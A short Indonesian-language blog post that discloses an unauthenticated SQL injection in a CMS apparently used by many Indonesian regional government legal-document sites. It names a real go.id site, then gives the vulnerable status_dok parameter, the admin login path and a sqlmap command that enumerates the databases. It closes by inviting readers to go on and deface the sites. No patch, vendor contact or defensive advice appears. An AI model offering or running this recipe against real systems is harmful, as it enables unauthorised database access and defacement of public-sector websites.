AcehJDIHCMS - Unauthenticated SQL Injection


 -

Hai Sobat

Saya ikal,

Disini saya akan sharing sesuatu nih.

-


Kali ini kita akan kembali membahas mengenai vulnerability lagi nih. Kali ini kita akan bahas vulnerability di WebApp "go.id" kembali :D.


Jadi awalnya ada temen saya ***ck_X12 yang minta saya iseng - iseng di CMS ini https://jdih.acehbaratdayakab.go.id/, Ga tau nama CMS nya apa, sekilas mirip ama AcehCMS jika dilihat dari admin loginnya :D. yaudah iseng - iseng aja dah buat ide artikel kan :D.


Tampilan


Singkat cerita i found this. pas saya cek cek, ternyata lumayan banyak yang pakai ini WebApp, kira - kira ada 15++ lebih yang pakai :D. yah sung aje gua publish ye kan. Okeh kita udahan aja basa basinya, Kita masuk lagi kepembahasan.


Description :

- Vulnerable Parameter :

https://localhost/dih/jsondata?status_dok=[value][SQL Injection]

https://localhost/[path]/dih/jsondata?status_dok=[value][SQL Injection]

- Admin Login :

https://localhost/secure/login

https://localhost/[path]/secure/login

- SQLmap Command :


$sqlmap.py -u "https://localhost/dih/jsondata?status_dok=*" --dbs


Yah, Karena saya dari awal hanya ingin iseng - iseng untuk ide konten, jadi yah segini aja artikelnya :D. Bagi yang mau lanjutkan ampe jadi Hacked By Hacked By an silakan. Dan juga jika ada salah kata atau salah penulisan biarkan saja.


Reference : 

https://www.draxploit.web.id/2020/08/penjelasan-penginstallan-dan-cara-pakai.html


Thanks

See U